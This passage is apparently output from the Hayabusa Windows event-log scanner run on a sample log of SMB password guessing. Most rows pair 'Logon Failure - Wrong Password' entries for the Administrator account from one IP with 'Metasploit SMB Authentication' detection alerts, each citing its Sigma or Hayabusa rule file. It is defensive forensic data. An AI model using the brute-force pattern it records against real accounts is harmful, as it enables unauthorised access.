Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXSbx81GD6dYgHtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWbnppJfJ0Ll9oLW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoUjizV5iXImPGTe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHNG9oylnT46IObg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LUeAisNPQULjD2t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2sB5MlRw4Ox1OWdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WaklWtKd8QByH8M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nzvyy6CUk43SVxZW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xeolvnD92qP1dJPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDvRwPbu6yQH2pEf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxKdofXKKkCLn2n6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkO9p50Q9iFolbmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p01SZCA784xmPMe2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XKaI3FHBbBXvVsES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmUk6sW8QreDIZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0w9SSWaaTX7chM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 46vgsyX5Wxn2rupf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PV8628a8GNKoFyzM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mksBFEFzkC08dB4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U6QlHT6Bp63JDehd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRj4fxcRY0Esegl6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dj6zQjZwGEBo0zNt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imfY1T2VMoaqDSUd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvPP8UYn9fLpRYl4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFTGQ5tzNI5k58cK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8Zj3g1WiTLx8OlJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x2Lr6j8Qt4xEmZZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BeDRsguCovO47lKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KqrDyaFTewMPSzD9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nBVMAki1Ghpknf6p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXKhNUmBUQBTyeNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1g9TVwsweaBfZgE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kWymb6ucohaBB60b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjL0zwlZofVuWhGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxsdzkJdnaZs5eKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PR6EpKvbqMeoQlKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZ3LMTtsVNI1gRO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75bNeXwYSZPhJdJ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lH6TVXSqJb1qLd3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edDWye6c2UhKznR6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxKUl1lynGY1ectn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vI5yUgukPBVRorJI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmR29QcBKMGVQ8rB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7luV5GfiT0v0h7D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yA7pIDFgQbLIInqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 84g2gO0253Ut4O1O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DRkFX9WTAhBZ8jc8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 